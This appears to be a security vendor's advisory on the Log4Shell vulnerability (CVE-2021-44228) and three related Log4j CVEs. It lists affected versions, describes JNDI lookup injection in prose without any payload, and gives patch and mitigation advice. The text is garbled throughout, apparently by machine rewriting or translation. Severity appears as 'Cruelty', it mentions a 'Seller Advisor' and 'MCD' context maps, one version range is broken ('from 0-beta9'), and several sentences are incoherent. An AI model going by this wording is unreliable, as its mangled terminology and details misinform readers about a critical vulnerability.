A critical zero-day vulnerability (CVE-2021-44228) Apache Log4J recently discovered, the popular Java open source logging library used in numerous applications worldwide. Maximum Intensity vulnerabilities have been identified as ‘Log4Shell’, which, if utilized, would allow remote attackers to take control of the vulnerable system and remotely run arbitrary code.
According to some security researchers, the error has become the most serious in the last decade due to the ease of exploitation and the sheer number of affected enterprise applications and cloud services. It comes with the most high-profile security vulnerabilities on the Internet right now and an intensity score of 10, the highest intensity rating possible.
After Log4Shell, a few more vulnerabilities were identified in the same Log4j library. These new vulnerabilities are – CVE-2021-45046 – a remote code execution, CVE-2021-45105 – denial of service and CVE-2021-4104 – a remote code execution.
Apache has addressed this vulnerability by publishing a security advisor with details of a patch and mitigation.
What is the weakness of Apache Log4J “Log4Shell”?
Log4j is an open source Java-based logging utility in the Apache logging service. Logging untrusted or user-controlled data with a weaker version of Log4J may result in remote code execution (RCE) against your application. These include log errors such as exception trace, authentication failure, and other unexpected vectors of user-controlled input.
Unauthorized Log4j, an unauthorized, remote attacker, can exploit this by sending a specially created JNDI
Request an injection on a target server and write to a log file, which leads to arbitrary code execution. This allows attackers to inject malicious payloads from LDAP servers or other JNDI services such as DNS, RMI, NIS, NDS, CORBA, and IIOP while the message lookup mechanism is active.
- Affected Log4j version: All versions from 2.0-beta9 to 2.14.1
- Cruelty: Critical
Why is the “Log4Shell” vulnerability critical?
An unauthorized, remote attacker can use this vulnerability in simple web requests that target vulnerable systems. Successful exploits can execute code arbitrarily and take complete control of the attacking system.
Apache Log4j is widely used in cloud and enterprise software services, so the universally available exploit code, easy exploitation and detection evasion techniques make this vulnerability extremely dangerous.
CVE-2021-45046, CVE-2021-45105, CVE-2021-4104 Log 4J:
CVE-2021-45046 Affects versions 2.0-beta9 to 2.15.0 except 2.12.2 Initially marked as “low” intensity, but later moved to “critical” remote code execution vulnerabilities. With a non-default pattern layout including context lookup, logging configuration and control over the thread context map (MCD) pattern, attackers can create malicious input using the JNDI lookup pattern that can leak DOS or data and execute remote code.
- Affected Log4j version: All versions except 2.12.2 from 0-beta9 to 2.15.0
- Cruelty: Critical
CVE-2021-45105 Log4j is affecting versions from 2.0-beta9 to 2.16.0 where non-default configuration, invaders may send requests made with recursive lookup, which may cause thread denial of service controlling thread context map data.
- Affected Log4j version: All versions from 2.0-beta9 to 2.16.0
- Cruelty: High
CVE-2021-4104 Log4j is affecting version 1.2 when Log4j is configured to use JMSAppender to execute JNDI requests which may cause remote code execution.
- Affected Log4j version: Version 1.2
- Cruelty: High
Mitigation of “Log4Shell”
- Update to the latest Apache Log4j version immediately Here.
- Please read Seller Advisor.
- Update network security solutions and endpoints with the latest definitions.
Quick healing coverage for “Log4Shell”
We’ve published IPS rules to detect and block remote attacks using vulnerable Log4j installations. We will continue to monitor developments around this threat and improve our identification if necessary. We encourage all our customers to properly patch their systems and update their anti-virus software with the latest VDB updates.
